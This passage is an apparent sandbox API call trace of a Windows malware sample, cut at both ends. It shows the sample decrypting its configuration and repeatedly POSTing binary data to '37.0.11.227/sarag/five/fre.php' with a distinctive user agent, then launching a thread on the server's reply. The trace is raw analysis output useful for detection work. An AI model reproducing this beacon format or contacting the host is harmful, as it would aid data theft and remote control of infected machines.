dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0321.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.384] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0321.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.387] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0321.387] GetProcessHeap () returned 0x690000 [0321.387] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0321.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.388] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.399] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.400] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.401] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.401] GetProcessHeap () returned 0x690000 [0321.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0321.401] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.401] GetProcessHeap () returned 0x690000 [0321.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0321.402] GetProcessHeap () returned 0x690000 [0321.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0321.403] GetProcessHeap () returned 0x690000 [0321.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0321.403] GetProcessHeap () returned 0x690000 [0321.403] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0321.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.404] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.410] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0321.416] GetProcessHeap () returned 0x690000 [0321.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0321.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.417] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0321.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.420] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.421] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.421] GetProcessHeap () returned 0x690000 [0321.421] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0321.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.422] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0321.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.423] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0321.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.424] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0321.424] GetProcessHeap () returned 0x690000 [0321.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0321.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.425] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0321.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.426] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0321.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.427] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0321.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.427] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0321.427] GetProcessHeap () returned 0x690000 [0321.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0321.427] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0321.428] GetProcessHeap () returned 0x690000 [0321.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0321.428] socket (af=2, type=1, protocol=6) returned 0xb04 [0321.428] connect (s=0xb04, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0321.458] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0321.458] GetProcessHeap () returned 0x690000 [0321.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0321.458] GetProcessHeap () returned 0x690000 [0321.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0321.459] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.459] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.459] GetProcessHeap () returned 0x690000 [0321.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0321.460] GetProcessHeap () returned 0x690000 [0321.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.460] GetProcessHeap () returned 0x690000 [0321.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0321.460] GetProcessHeap () returned 0x690000 [0321.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0321.461] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.462] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.463] GetProcessHeap () returned 0x690000 [0321.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0321.463] GetProcessHeap () returned 0x690000 [0321.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.464] send (s=0xb04, buf=0x6ad508*, len=242, flags=0) returned 242 [0321.465] send (s=0xb04, buf=0x6aba40*, len=159, flags=0) returned 159 [0321.465] GetProcessHeap () returned 0x690000 [0321.465] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0321.465] recv (in: s=0xb04, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0321.556] GetProcessHeap () returned 0x690000 [0321.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0321.557] GetProcessHeap () returned 0x690000 [0321.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0321.557] GetProcessHeap () returned 0x690000 [0321.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0321.558] GetProcessHeap () returned 0x690000 [0321.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0321.558] closesocket (s=0xb04) returned 0 [0321.558] GetProcessHeap () returned 0x690000 [0321.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0321.559] GetProcessHeap () returned 0x690000 [0321.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0321.559] GetProcessHeap () returned 0x690000 [0321.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0321.559] GetProcessHeap () returned 0x690000 [0321.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0321.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1850) returned 0xb04 [0321.568] Sleep (dwMilliseconds=0xea60) [0321.569] GetProcessHeap () returned 0x690000 [0321.569] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0321.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.570] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.577] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0321.585] GetProcessHeap () returned 0x690000 [0321.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0321.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.588] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0321.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.589] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.590] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.590] GetProcessHeap () returned 0x690000 [0321.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0321.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.592] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0321.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.593] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0321.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.603] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0321.604] GetProcessHeap () returned 0x690000 [0321.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0321.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.605] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.606] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.606] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.607] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.607] GetProcessHeap () returned 0x690000 [0321.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0321.607] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.608] GetProcessHeap () returned 0x690000 [0321.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0321.611] GetProcessHeap () returned 0x690000 [0321.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0321.612] GetProcessHeap () returned 0x690000 [0321.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0321.613] GetProcessHeap () returned 0x690000 [0321.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0321.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.614] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.619] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0321.626] GetProcessHeap () returned 0x690000 [0321.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0321.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.627] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0321.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.628] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.629] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.629] GetProcessHeap () returned 0x690000 [0321.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0321.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.633] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0321.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.634] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0321.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.635] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0321.635] GetProcessHeap () returned 0x690000 [0321.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0321.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.636] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0321.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.636] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0321.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.637] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0321.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.638] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0321.638] GetProcessHeap () returned 0x690000 [0321.638] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0321.638] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0321.638] GetProcessHeap () returned 0x690000 [0321.638] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0321.638] socket (af=2, type=1, protocol=6) returned 0xb08 [0321.639] connect (s=0xb08, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0321.664] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0321.664] GetProcessHeap () returned 0x690000 [0321.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0321.664] GetProcessHeap () returned 0x690000 [0321.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0321.665] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.666] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.666] GetProcessHeap () returned 0x690000 [0321.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0321.666] GetProcessHeap () returned 0x690000 [0321.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.667] GetProcessHeap () returned 0x690000 [0321.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0321.667] GetProcessHeap () returned 0x690000 [0321.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0321.668] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.668] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.668] GetProcessHeap () returned 0x690000 [0321.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0321.668] GetProcessHeap () returned 0x690000 [0321.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.669] send (s=0xb08, buf=0x6ad508*, len=242, flags=0) returned 242 [0321.670] send (s=0xb08, buf=0x6aba40*, len=159, flags=0) returned 159 [0321.670] GetProcessHeap () returned 0x690000 [0321.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0321.670] recv (in: s=0xb08, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0321.754] GetProcessHeap () returned 0x690000 [0321.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0321.755] GetProcessHeap () returned 0x690000 [0321.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0321.756] GetProcessHeap () returned 0x690000 [0321.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0321.758] GetProcessHeap () returned 0x690000 [0321.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0321.759] closesocket (s=0xb08) returned 0 [0321.759] GetProcessHeap () returned 0x690000 [0321.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0321.759] GetProcessHeap () returned 0x690000 [0321.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0321.760] GetProcessHeap () returned 0x690000 [0321.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0321.761] GetProcessHeap () returned 0x690000 [0321.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0321.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1854) returned 0xb08 [0321.765] Sleep (dwMilliseconds=0xea60) [0321.767] GetProcessHeap () returned 0x690000 [0321.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0321.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.777] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0321.784] GetProcessHeap () returned 0x690000 [0321.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0321.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.786] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0321.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.787] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.800] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.801] GetProcessHeap () returned 0x690000 [0321.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0321.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.802] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0321.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.816] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0321.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.817] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0321.817] GetProcessHeap () returned 0x690000 [0321.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0321.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.821] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.822] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.823] StrStrA 